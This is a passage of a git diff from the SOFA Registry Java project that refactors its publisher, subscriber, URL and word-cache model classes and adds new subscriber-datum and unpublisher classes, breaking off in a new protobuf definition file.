a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Publisher.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Publisher.java index 8ecd7566b..78823775f 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Publisher.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Publisher.java @@ -16,99 +16,123 @@ */ package com.alipay.sofa.registry.common.model.store; +import com.alipay.sofa.registry.common.model.*; import com.alipay.sofa.registry.common.model.PublishType; import com.alipay.sofa.registry.common.model.ServerDataBox; import com.fasterxml.jackson.annotation.JsonIgnore; - import java.util.List; /** - * * @author shangyu.wh * @version $Id: Publisher.java, v 0.1 2017-11-30 16:04 shangyu.wh Exp $ */ public class Publisher extends BaseInfo { - /** UID */ - private static final long serialVersionUID = 5859214992132895021L; - - private List dataList; - - private PublishType publishType = PublishType.NORMAL; - - /** - * Getter method for property dataList. - * - * @return property value of dataList - */ - public List getDataList() { - return dataList; - } - - /** - * Setter method for property dataList. - * - * @param dataList value to be assigned to property dataList - */ - public void setDataList(List dataList) { - this.dataList = dataList; - } - - public PublishType getPublishType() { - return publishType; + /** UID */ + private static final long serialVersionUID = 5859214992132895021L; + + private List dataList; + + private PublishType publishType = PublishType.NORMAL; + + private PublishSource publishSource = PublishSource.CLIENT; + + @JsonIgnore private ProcessId sessionProcessId; + + public Publisher() {} + + /** + * Getter method for property sessionProcessId. + * + * @return property value of sessionProcessId + */ + public ProcessId getSessionProcessId() { + return sessionProcessId; + } + + /** + * Setter method for property sessionProcessId. + * + * @param sessionProcessId value to be assigned to property sessionProcessId + */ + public void setSessionProcessId(ProcessId sessionProcessId) { + this.sessionProcessId = sessionProcessId; + } + + /** + * Getter method for property dataList. + * + * @return property value of dataList + */ + public List getDataList() { + return dataList; + } + + /** + * Setter method for property dataList. + * + * @param dataList value to be assigned to property dataList + */ + public void setDataList(List dataList) { + this.dataList = dataList; + } + + public PublishType getPublishType() { + return publishType; + } + + /** + * Setter method for property publishType. + * + * @param publishType value to be assigned to property publishType + */ + public void setPublishType(PublishType publishType) { + this.publishType = publishType; + } + + @Override + @JsonIgnore + public DataType getDataType() { + return DataType.PUBLISHER; + } + + @Override + protected String getOtherInfo() { + final StringBuilder sb = new StringBuilder("dataList="); + if (dataList != null) { + sb.append(dataList.size()); + } else { + sb.append("null"); } - - /** - * Setter method for property publishType. - * - * @param publishType value to be assigned to property publishType - */ - public void setPublishType(PublishType publishType) { - this.publishType = publishType; - } - - @Override - @JsonIgnore - public DataType getDataType() { - return DataType.PUBLISHER; - } - - @Override - protected String getOtherInfo() { - final StringBuilder sb = new StringBuilder("dataList="); - if (dataList != null) { - sb.append(dataList.size()); - } else { - sb.append("null"); - } - sb.append(",").append("publishType=").append(publishType); - return sb.toString(); - } - - /** - * change publisher word cache - * @param publisher - * @return - */ - public static Publisher processPublisher(Publisher publisher) { - - publisher.setDataInfoId(publisher.getDataInfoId()); - publisher.setInstanceId(publisher.getInstanceId()); - publisher.setGroup(publisher.getGroup()); - publisher.setDataId(publisher.getDataId()); - publisher.setClientId(publisher.getClientId()); - publisher.setCell(publisher.getCell()); - publisher.setProcessId(publisher.getProcessId()); - publisher.setAppName(publisher.getAppName()); - - if (publisher.getSourceAddress() != null) { - publisher.setSourceAddress(new URL(publisher.getSourceAddress().getIpAddress(), - publisher.getSourceAddress().getPort())); - } - - publisher.setAttributes(publisher.getAttributes()); - - return publisher; - } - -} \ No newline at end of file + sb.append(",").append("publishType=").append(publishType); + return sb.toString(); + } + + /** + * change publisher word cache + * + * @param publisher + * @return + */ + public static Publisher internPublisher(Publisher publisher) { + publisher.setRegisterId(publisher.getRegisterId()); + publisher.setDataInfoId(publisher.getDataInfoId()); + publisher.setInstanceId(publisher.getInstanceId()); + publisher.setGroup(publisher.getGroup()); + publisher.setDataId(publisher.getDataId()); + publisher.setClientId(publisher.getClientId()); + publisher.setCell(publisher.getCell()); + publisher.setProcessId(publisher.getProcessId()); + publisher.setAppName(publisher.getAppName()); + + return publisher; + } + + public PublishSource getPublishSource() { + return publishSource; + } + + public void setPublishSource(PublishSource publishSource) { + this.publishSource = publishSource; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/StoreData.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/StoreData.java index 1ec2d9a66..7884b89e0 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/StoreData.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/StoreData.java @@ -17,28 +17,30 @@ package com.alipay.sofa.registry.common.model.store; /** - * * @author shangyu.wh * @version $Id: StoreData.java, v 0.1 2017-11-30 19:48 shangyu.wh Exp $ */ public interface StoreData { - /** - * DataType enum - */ - enum DataType { - SUBSCRIBER, PUBLISHER, WATCHER, UNPUBLISHER - } + /** DataType enum */ + enum DataType { + SUBSCRIBER, + PUBLISHER, + WATCHER, + UN_PUBLISHER + } - /** - * get store dataType - * @return - */ - DataType getDataType(); + /** + * get store dataType + * + * @return + */ + DataType getDataType(); - /** - * get store data ID - * @return - */ - ID getId(); -} \ No newline at end of file + /** + * get store data ID + * + * @return + */ + ID getId(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/SubDatum.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/SubDatum.java new file mode 100644 index 000000000..2b34ecfd7 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/SubDatum.java @@ -0,0 +1,139 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.store; + +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Lists; +import java.io.Serializable; +import java.util.Collection; +import java.util.Collections; +import java.util.List; + +public final class SubDatum implements Serializable { + private static final long serialVersionUID = 5307489721610438103L; + + private final String dataInfoId; + + private final String dataCenter; + + private final String dataId; + + private final String instanceId; + + private final String group; + + private final List publishers; + + private final long version; + + public SubDatum( + String dataInfoId, + String dataCenter, + long version, + Collection publishers, + String dataId, + String instanceId, + String group) { + this.dataInfoId = dataInfoId; + this.dataCenter = dataCenter; + this.version = version; + this.publishers = Collections.unmodifiableList(Lists.newArrayList(publishers)); + this.dataId = dataId; + this.instanceId = instanceId; + this.group = group; + } + + public String getDataInfoId() { + return dataInfoId; + } + + public String getDataCenter() { + return dataCenter; + } + + public String getDataId() { + return dataId; + } + + public String getInstanceId() { + return instanceId; + } + + public String getGroup() { + return group; + } + + public List getPublishers() { + return publishers; + } + + public long getVersion() { + return version; + } + + public boolean isEmpty() { + return publishers.isEmpty(); + } + + public int getDataBoxBytes() { + int bytes = 0; + for (SubPublisher p : publishers) { + bytes += p.getDataBoxBytes(); + } + return bytes; + } + + @Override + public String toString() { + return StringFormatter.format( + "SubDatum{{},{},ver={},num={},bytes={}}", + dataInfoId, + dataCenter, + version, + publishers.size(), + getDataBoxBytes()); + } + + public static SubDatum intern(SubDatum datum) { + if (datum == null) { + return null; + } + final String dataInfoId = WordCache.getWordCache(datum.dataInfoId); + final String dataCenter = WordCache.getWordCache(datum.dataCenter); + + final String dataId = WordCache.getWordCache(datum.dataId); + final String instanceId = WordCache.getWordCache(datum.instanceId); + final String group = WordCache.getWordCache(datum.group); + + List publishers = Lists.newArrayListWithCapacity(datum.publishers.size()); + for (SubPublisher publisher : datum.publishers) { + final String cell = WordCache.getWordCache(publisher.getCell()); + publishers.add( + new SubPublisher( + publisher.getRegisterId(), + cell, + publisher.getDataList(), + publisher.getClientId(), + publisher.getVersion(), + publisher.getSrcAddressString(), + publisher.getRegisterTimestamp(), + publisher.getPublishSource())); + } + return new SubDatum( + dataInfoId, dataCenter, datum.version, publishers, dataId, instanceId, group); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/SubPublisher.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/SubPublisher.java new file mode 100644 index 000000000..eeb9a3892 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/SubPublisher.java @@ -0,0 +1,116 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.store; + +import com.alipay.sofa.registry.common.model.PublishSource; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.ServerDataBox; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Lists; +import java.io.Serializable; +import java.util.Collections; +import java.util.List; + +public final class SubPublisher implements Serializable { + private final String registerId; + private final String cell; + private final String clientId; + private final String srcAddressString; + private final List dataList; + private final long registerTimestamp; + private final long version; + private final PublishSource publishSource; + + public SubPublisher( + String registerId, + String cell, + List dataList, + String clientId, + long version, + String srcAddressString, + long registerTimestamp, + PublishSource publishSource) { + this.registerId = registerId; + this.cell = cell; + this.clientId = clientId; + this.version = version; + this.srcAddressString = srcAddressString; + this.dataList = + dataList == null + ? Collections.emptyList() + : Collections.unmodifiableList(Lists.newArrayList(dataList)); + this.registerTimestamp = registerTimestamp; + this.publishSource = publishSource; + } + + public String getCell() { + return cell; + } + + public List getDataList() { + return dataList; + } + + public String getClientId() { + return clientId; + } + + public String getSrcAddressString() { + return srcAddressString; + } + + public long getRegisterTimestamp() { + return registerTimestamp; + } + + public int getDataBoxBytes() { + int bytes = 0; + for (ServerDataBox box : dataList) { + bytes += box.byteSize(); + } + return bytes; + } + + public long getVersion() { + return version; + } + + public RegisterVersion registerVersion() { + return RegisterVersion.of(version, registerTimestamp); + } + + public String getRegisterId() { + return registerId; + } + + @Override + public String toString() { + return StringFormatter.format( + "SubPublisher{{},cell={},src={},datas={},bytes={},ver={},ts={}}", + registerId, + cell, + srcAddressString, + dataList.size(), + getDataBoxBytes(), + version, + registerTimestamp); + } + + public PublishSource getPublishSource() { + return publishSource; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Subscriber.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Subscriber.java index 2f0b8b78d..4fce66a78 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Subscriber.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Subscriber.java @@ -18,147 +18,139 @@ import com.alipay.sofa.registry.common.model.ElementType; import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.util.StringFormatter; import com.fasterxml.jackson.annotation.JsonIgnore; - -import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; +import java.util.*; /** - * * @author shangyu.wh * @version $Id: Subscriber.java, v 0.1 2017-11-30 16:03 shangyu.wh Exp $ */ public class Subscriber extends BaseInfo { - /** UID */ - private static final long serialVersionUID = 98433360274932292L; - /** */ - private ScopeEnum scope; - /** */ - private ElementType elementType; - - /** - * all dataCenter push dataInfo version - */ - private Map lastPushVersions = new ConcurrentHashMap<>(); - - /** - * Getter method for property scope. - * - * @return property value of scope - */ - public ScopeEnum getScope() { - return scope; - } - - /** - * Setter method for property scope. - * - * @param scope value to be assigned to property scope - */ - public void setScope(ScopeEnum scope) { - this.scope = scope; - } - - public ElementType getElementType() { - return elementType; - } - - /** - * check version input greater than current version - * @param version - * @return - */ - public boolean checkVersion(String dataCenter, Long version) { - - Long oldVersion = lastPushVersions.get(dataCenter); - if (oldVersion == null) { - return version != null; - } else { - if (version != null) { - return version > oldVersion; - } - return false; - } + /** UID */ + private static final long serialVersionUID = 98433360274932292L; + /** */ + private ScopeEnum scope; + /** */ + private ElementType elementType; + /** */ + + /** last push context */ + private final Map lastPushContexts = new HashMap<>(4); + + /** + * Getter method for property scope. + * + * @return property value of scope + */ + public ScopeEnum getScope() { + return scope; + } + + /** + * Setter method for property scope. + * + * @param scope value to be assigned to property scope + */ + public void setScope(ScopeEnum scope) { + this.scope = scope; + } + + public ElementType getElementType() { + return elementType; + } + + // check the version + public synchronized boolean checkVersion(String dataCenter, long version) { + final PushContext ctx = lastPushContexts.get(dataCenter); + if (ctx == null) { + return true; } + return ctx.pushVersion < version; + } - /** - * check version input greater or equal to current version - * @param version - * @return - */ - public void checkAndUpdateVersion(String dataCenter, Long version) { - - while (true) { - Long oldVersion = lastPushVersions.putIfAbsent(dataCenter, version); - // Add firstly - if (oldVersion == null) { - break; - } else { - if (version > oldVersion) { - if (lastPushVersions.replace(dataCenter, oldVersion, version)) { - break; - } - } else { - break; - } - } - } - } - - /** - * Setter method for property elementType. - * - * @param elementType value to be assigned to property elementType - */ - public void setElementType(ElementType elementType) { - this.elementType = elementType; - } - - @Override - @JsonIgnore - public DataType getDataType() { - return DataType.SUBSCRIBER; - } + public synchronized boolean checkAndUpdateVersion(String dataCenter, long pushVersion) { + final PushContext ctx = lastPushContexts.computeIfAbsent(dataCenter, k -> new PushContext()); - @Override - protected String getOtherInfo() { - final StringBuilder sb = new StringBuilder("scope="); - sb.append(scope).append(","); - sb.append("elementType=").append(elementType).append(","); - sb.append("lastPushVersion=").append(lastPushVersions); - return sb.toString(); + if (ctx.pushVersion < pushVersion) { + ctx.pushVersion = pushVersion; + return true; } + return false; + } - /** - * Getter method for property lastPushVersions. - * - * @return property value of lastPushVersions - */ - public Map getLastPushVersions() { - return lastPushVersions; + public synchronized boolean hasPushed() { + // TODO now not care multi-datacenter + if (lastPushContexts.isEmpty()) { + return false; } - - /** - * Setter method for property lastPushVersions . - * - * @param lastPushVersions value to be assigned to property lastPushVersions - */ - public void setLastPushVersions(Map lastPushVersions) { - this.lastPushVersions = lastPushVersions; + for (PushContext ctx : lastPushContexts.values()) { + if (ctx.pushVersion != 0) { + return true; + } } + return false; + } + + /** + * Setter method for property elementType. + * + * @param elementType value to be assigned to property elementType + */ + public void setElementType(ElementType elementType) { + this.elementType = elementType; + } + + @Override + @JsonIgnore + public DataType getDataType() { + return DataType.SUBSCRIBER; + } + + @Override + protected String getOtherInfo() { + final StringBuilder sb = new StringBuilder("scope="); + sb.append(scope).append(","); + sb.append("elementType=").append(elementType).append(","); + sb.append("ctx=").append(lastPushContexts); + return sb.toString(); + } + + public String printPushContext() { + final StringBuilder sb = new StringBuilder(128); + return sb.append(lastPushContexts).toString(); + } + + public synchronized long getPushVersion(String dataCenter) { + PushContext ctx = lastPushContexts.get(dataCenter); + return ctx == null ? 0 : ctx.pushVersion; + } + + /** + * change subscriber word cache + * + * @param subscriber + * @return + */ + public static Subscriber internSubscriber(Subscriber subscriber) { + subscriber.setDataInfoId(subscriber.getDataInfoId()); + subscriber.setInstanceId(subscriber.getInstanceId()); + subscriber.setGroup(subscriber.getGroup()); + subscriber.setDataId(subscriber.getDataId()); + subscriber.setCell(subscriber.getCell()); + subscriber.setProcessId(subscriber.getProcessId()); + subscriber.setAppName(subscriber.getAppName()); + + return subscriber; + } + + private static class PushContext { + long pushVersion; - /** - * @see Object#toString() - */ @Override public String toString() { - final StringBuilder sb = new StringBuilder("Subscriber{"); - sb.append("scope=").append(scope); - sb.append(", elementType=").append(elementType); - sb.append(", lastPushVersions=").append(lastPushVersions); - sb.append(", super=").append(super.toString()); - sb.append('}'); - return sb.toString(); + return StringFormatter.format("PushCtx{{}}", pushVersion); } -} \ No newline at end of file + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/URL.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/URL.java index 8f68d56e6..27a0e7123 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/URL.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/URL.java @@ -18,248 +18,284 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; - import java.io.Serializable; import java.net.InetAddress; import java.net.InetSocketAddress; import java.net.UnknownHostException; import java.util.Map; +import java.util.Objects; /** - * * @author shangyu.wh * @version $Id: URL.java, v 0.1 2017-11-20 21:21 shangyu.wh Exp $ */ public final class URL implements Serializable { - private static final Logger LOGGER = LoggerFactory.getLogger(URL.class); - - /** symbol : */ - public static final char COLON = ':'; - - public static final byte HESSIAN_2 = 1; - - public static final byte PROTOBUF = 11; - - public static final byte JSON = 2; - - private ProtocolType protocol; - - private String host; - - private String ipAddress; - - private int port; - - private String path; - - private Byte serializerIndex; - - private Map parameters; - - private String addressString; - - /** - * ProtocolType Enum - */ - public enum ProtocolType { - TR, BOLT, HTTP - } - - public URL() { - } - - /** - * constructor - * @param protocol - * @param ipAddress - * @param port - * @param host - * @param path - * @param serializerIndex - * @param parameters - */ - public URL(ProtocolType protocol, String ipAddress, int port, String host, String path, - Byte serializerIndex, Map parameters) { - this.protocol = protocol; - this.host = host; - this.ipAddress = WordCache.getInstance().getWordCache(getIPAddressFromDomain(ipAddress)); - this.port = port; - this.addressString = WordCache.getInstance().getWordCache(buildAddressString()); - this.path = path; - this.serializerIndex = serializerIndex; - this.parameters = parameters; + private static final Logger LOGGER = LoggerFactory.getLogger(URL.class); + + /** symbol : */ + public static final char COLON = ':'; + + public static final byte HESSIAN_2 = 1; + + public static final byte PROTOBUF = 11; + + public static final byte JSON = 2; + + private ProtocolType protocol; + + private String host; + + private String ipAddress; + + private int port; + + private String path; + + private Byte serializerIndex; + + private Map parameters; + + private String addressString; + + /** ProtocolType Enum */ + public enum ProtocolType { + TR, + BOLT, + HTTP + } + + public URL() {} + + /** + * constructor + * + * @param protocol + * @param ipAddress + * @param port + * @param host + * @param path + * @param serializerIndex + * @param parameters + */ + public URL( + ProtocolType protocol, + String ipAddress, + int port, + String host, + String path, + Byte serializerIndex, + Map parameters) { + this.protocol = protocol; + this.host = host; + this.ipAddress = WordCache.getWordCache(getIPAddressFromDomain(ipAddress)); + this.port = port; + this.addressString = WordCache.getWordCache(buildAddressString()); + this.path = path; + this.serializerIndex = serializerIndex; + this.parameters = parameters; + } + + /** + * constructor + * + * @param ipAddress + * @param port + */ + public URL(String ipAddress, int port) { + this(null, ipAddress, port, "", "", HESSIAN_2, null); + } + + /** + * constructor + * + * @param address + */ + public URL(InetSocketAddress address) { + this(null, address.getAddress().getHostAddress(), address.getPort(), "", "", HESSIAN_2, null); + } + + /** + * constructor + * + * @param address + * @param serializerIndex + */ + public URL(InetSocketAddress address, Byte serializerIndex) { + this( + null, + address.getAddress().getHostAddress(), + address.getPort(), + "", + "", + serializerIndex, + null); + } + + /** + * constructor + * + * @param ipAddress + */ + public URL(String ipAddress) { + this(ipAddress, 0); + } + + /** + * url transfer to InetSocketAddress + * + * @param url + * @return + */ + public static InetSocketAddress toInetSocketAddress(URL url) { + return new InetSocketAddress(url.getIpAddress(), url.getPort()); + } + + /** + * Getter method for property protocol. + * + * @return property value of protocol + */ + public ProtocolType getProtocol() { + return protocol; + } + + /** + * Getter method for property host. + * + * @return property value of host + */ + public String getHost() { + return host; + } + + /** + * Getter method for property ipAddress. + * + * @return property value of ipAddress + */ + public String getIpAddress() { + return ipAddress; + } + + /** + * Getter method for property port. + * + * @return property value of port + */ + public int getPort() { + return port; + } + + /** + * Getter method for property path. + * + * @return property value of path + */ + public String getPath() { + return path; + } + + /** + * Getter method for property parameters. + * + * @return property value of parameters + */ + public Map getParameters() { + return parameters; + } + + /** + * Getter method for property addressString. + * + * @return property value of addressString + */ + public String getAddressString() { + return addressString; + } + + /** + * build address string + * + * @return + */ + public String buildAddressString() { + StringBuilder sb = new StringBuilder(32); + sb.append(ipAddress).append(COLON).append(port); + return sb.toString(); + } + + /** + * Getter method for property serializerIndex. + * + * @return property value of serializerIndex + */ + public Byte getSerializerIndex() { + return serializerIndex; + } + + private String getIPAddressFromDomain(String domain) { + try { + InetAddress a = InetAddress.getByName(domain); + return a.getHostAddress(); + } catch (UnknownHostException e) { + LOGGER.error("Can not resolve " + domain + " really ip."); } - - /** - * constructor - * @param ipAddress - * @param port - */ - public URL(String ipAddress, int port) { - this(null, ipAddress, port, "", "", HESSIAN_2, null); - } - - /** - * constructor - * @param address - */ - public URL(InetSocketAddress address) { - this(null, address.getAddress().getHostAddress(), address.getPort(), "", "", HESSIAN_2, - null); + return domain; + } + + /** + * TODO Other protocol + * + * @param url + * @return + */ + public static URL valueOf(String url) { + + if (url == null || (url = url.trim()).length() == 0) { + throw new IllegalArgumentException("url == null"); } - - /** - * constructor - * @param address - * @param serializerIndex - */ - public URL(InetSocketAddress address, Byte serializerIndex) { - this(null, address.getAddress().getHostAddress(), address.getPort(), "", "", - serializerIndex, null); + String ipAddress = ""; + String path = ""; + int port = 0; + ProtocolType protocol = null; + Map parameters = null; + + int i = url.indexOf(":"); + if (i >= 0 && i < url.length() - 1) { + port = Integer.parseInt(url.substring(i + 1)); + url = url.substring(0, i); } - - /** - * constructor - * @param ipAddress - */ - public URL(String ipAddress) { - this(ipAddress, 0); + if (url.length() > 0) { + ipAddress = url; } - /** - * url transfer to InetSocketAddress - * @param url - * @return - */ - public static InetSocketAddress toInetSocketAddress(URL url) { - return new InetSocketAddress(url.getIpAddress(), url.getPort()); - } - - /** - * Getter method for property protocol. - * - * @return property value of protocol - */ - public ProtocolType getProtocol() { - return protocol; - } - - /** - * Getter method for property host. - * - * @return property value of host - */ - public String getHost() { - return host; - } - - /** - * Getter method for property ipAddress. - * - * @return property value of ipAddress - */ - public String getIpAddress() { - return ipAddress; - } - - /** - * Getter method for property port. - * - * @return property value of port - */ - public int getPort() { - return port; - } - - /** - * Getter method for property path. - * - * @return property value of path - */ - public String getPath() { - return path; - } - - /** - * Getter method for property parameters. - * - * @return property value of parameters - */ - public Map getParameters() { - return parameters; - } - - /** - * Getter method for property addressString. - * - * @return property value of addressString - */ - public String getAddressString() { - return addressString; - } - - /** - * build address string - * @return - */ - public String buildAddressString() { - StringBuilder sb = new StringBuilder(); - sb.append(ipAddress).append(COLON).append(port); - return sb.toString(); - } - - /** - * Getter method for property serializerIndex. - * - * @return property value of serializerIndex - */ - public Byte getSerializerIndex() { - return serializerIndex; - } - - private String getIPAddressFromDomain(String domain) { - try { - InetAddress a = InetAddress.getByName(domain); - return a.getHostAddress(); - } catch (UnknownHostException e) { - LOGGER.error("Can not resolve " + domain + " really ip."); - } - return domain; - } - - /** - * TODO Other protocol - * @param url - * @return - */ - public static URL valueOf(String url) { - - if (url == null || (url = url.trim()).length() == 0) { - throw new IllegalArgumentException("url == null"); - } - String ipAddress = ""; - String path = ""; - int port = 0; - ProtocolType protocol = null; - Map parameters = null; - - int i = url.indexOf(":"); - if (i >= 0 && i < url.length() - 1) { - port = Integer.parseInt(url.substring(i + 1)); - url = url.substring(0, i); - } - if (url.length() > 0) { - ipAddress = url; - } - - return new URL(protocol, ipAddress, port, "", path, HESSIAN_2, parameters); - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("URL{"); - sb.append("address='").append(addressString).append('\''); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file + return new URL(protocol, ipAddress, port, "", path, HESSIAN_2, parameters); + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + URL url = (URL) o; + return port == url.port + && protocol == url.protocol + && Objects.equals(host, url.host) + && Objects.equals(ipAddress, url.ipAddress) + && Objects.equals(path, url.path) + && Objects.equals(parameters, url.parameters) + && Objects.equals(addressString, url.addressString); + } + + @Override + public int hashCode() { + return Objects.hash(protocol, host, ipAddress, port, path, parameters, addressString); + } + + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("URL{"); + sb.append("address='").append(addressString).append('\''); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/UnPublisher.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/UnPublisher.java new file mode 100644 index 000000000..761cfa229 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/UnPublisher.java @@ -0,0 +1,64 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.store; + +import com.alipay.sofa.registry.common.model.ProcessId; + +/** + * @author qian.lqlq + * @version $Id: UnPublisher.java, v 0.1 2018-01-11 20:05 qian.lqlq Exp $ + */ +public class UnPublisher extends Publisher { + + /** + * @param dataInfoId + * @param registerId + * @param registerTimeStamp + */ + public UnPublisher( + String dataInfoId, + ProcessId sessionProcessId, + String registerId, + long registerTimeStamp, + long version) { + setDataInfoId(dataInfoId); + setRegisterId(registerId); + setRegisterTimestamp(registerTimeStamp); + setVersion(version); + // avoid new datum dataId is null + DataInfo dataInfo = DataInfo.valueOf(dataInfoId); + setDataId(dataInfo.getDataId()); + setGroup(dataInfo.getGroup()); + setInstanceId(dataInfo.getInstanceId()); + + setSessionProcessId(sessionProcessId); + } + + @Override + public DataType getDataType() { + return DataType.UN_PUBLISHER; + } + + public static UnPublisher of(Publisher publisher) { + return new UnPublisher( + publisher.getDataInfoId(), + publisher.getSessionProcessId(), + publisher.getRegisterId(), + publisher.getRegisterTimestamp(), + publisher.getVersion()); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Watcher.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Watcher.java index 6ffa610f9..9e5b75036 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Watcher.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/Watcher.java @@ -17,14 +17,33 @@ package com.alipay.sofa.registry.common.model.store; /** - * * @author shangyu.wh * @version $Id: Watcher.java, v 0.1 2018-04-17 18:22 shangyu.wh Exp $ */ public class Watcher extends BaseInfo { - @Override - public DataType getDataType() { - return DataType.WATCHER; - } -} \ No newline at end of file + @Override + public DataType getDataType() { + return DataType.WATCHER; + } + + /** + * change watcher word cache + * + * @param watcher + * @return + */ + public static Watcher internWatcher(Watcher watcher) { + watcher.setRegisterId(watcher.getRegisterId()); + watcher.setDataInfoId(watcher.getDataInfoId()); + watcher.setInstanceId(watcher.getInstanceId()); + watcher.setGroup(watcher.getGroup()); + watcher.setDataId(watcher.getDataId()); + watcher.setClientId(watcher.getClientId()); + watcher.setCell(watcher.getCell()); + watcher.setProcessId(watcher.getProcessId()); + watcher.setAppName(watcher.getAppName()); + + return watcher; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/WordCache.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/WordCache.java index 2734c8ac0..9480c21c4 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/WordCache.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/WordCache.java @@ -16,48 +16,27 @@ */ package com.alipay.sofa.registry.common.model.store; -import java.util.concurrent.ConcurrentHashMap; +import com.google.common.collect.Interner; +import com.google.common.collect.Interners; /** - * * @author shangyu.wh * @version $Id: WordCache.java, v 0.1 2018-11-06 12:01 shangyu.wh Exp $ */ -public class WordCache { +public final class WordCache { + private WordCache() {} - private static volatile WordCache instance; + /** word cache map */ + private static final Interner interners = Interners.newWeakInterner(); - /** - * get WordCache instance - * @return - */ - public static WordCache getInstance() { - if (instance == null) { - synchronized (WordCache.class) { - if (instance == null) { - instance = new WordCache(); - } - } - } - return instance; + /** + * @param s + * @return String + */ + public static String getWordCache(String s) { + if (s == null) { + return null; } - - /** - * word cache map - */ - private ConcurrentHashMap map = new ConcurrentHashMap<>(); - - /** - * - * @param s - * @return String - */ - public String getWordCache(String s) { - if (s == null) { - return null; - } - String oldValue = map.putIfAbsent(s, s); - return oldValue == null ? s : oldValue; - } - -} \ No newline at end of file + return interners.intern(s); + } +} diff --git a/server/common/model/src/main/resources/proto/AppDiscoveryMetaPb.proto b/server/common/model/src/main/resources/proto/AppDiscoveryMetaPb.proto new file mode 100644 index 000000000..15a78a435 --- /dev/null +++ b/server/common/model/src/main/resources/proto/AppDiscoveryMetaPb.proto @@ -0,0 +1,56 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "proto"; + + +message MetaRegister { + string application = 1; + string revision = 2; + string clientVersion = 3; + map baseParams = 4; + map services = 5; +} + +message MetaService{ + string id = 1; + map params = 3; +} + +message StringList{ + repeated string values = 1; +} + +message AppList { + int64 version = 1; + repeated string apps = 2; +} + +message ServiceAppMappingRequest{ + 